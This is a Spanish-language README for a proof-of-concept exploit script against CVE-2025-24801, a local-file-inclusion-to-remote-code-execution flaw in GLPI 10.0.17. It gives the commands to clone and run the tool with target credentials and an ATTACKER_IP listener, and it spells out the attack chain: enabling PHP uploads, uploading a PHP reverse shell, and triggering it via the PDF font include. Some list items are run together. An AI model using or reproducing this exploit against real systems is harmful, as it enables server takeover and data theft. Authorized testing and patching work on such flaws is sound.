
CVE-2025-24801 Exploit
Este repositorio contiene un script de prueba de concepto (poc.py) que explota CVE-2025-24801, una vulnerabilidad LFI a RCE en GLPI 10.0.17. Automatiza:
.php actualizando la configuración del tipo de documentogit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: URL base de la instancia de GLPI (ej. https://example.com/glpi)--user / --password: Credenciales válidas de un técnico de GLPI--lhost / --lport: IP y puerto del atacante para el listener del shell reversoEl script utiliza automáticamente --doc-id 1 por defecto para actualizar el primer tipo de documento.
Después de la ejecución, el script:
.php actualizando el tipo de documento ID 1exploit.php que contiene un payload de shell reverso PHPLuego deberás activar manualmente el LFI especificando el nombre del archivo subido en el include de fuente PDF (por ejemplo, mediante la función de exportación de informes) para lograr RCE.
/front/login.php y envía las credenciales para autenticarse./front/documenttype.form.php?id=1, analiza el token CSRF y añade php a las extensiones permitidas./front/ticket.form.php para un token CSRF, luego usa /ajax/fileupload.php (con X-Requested-With: XMLHttpRequest) para subir un shell reverso PHP.pdffont durante la exportación de informes.Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. No la uses contra sistemas sin permiso explícito.
Creado con fines educativos y de pruebas de penetración autorizadas.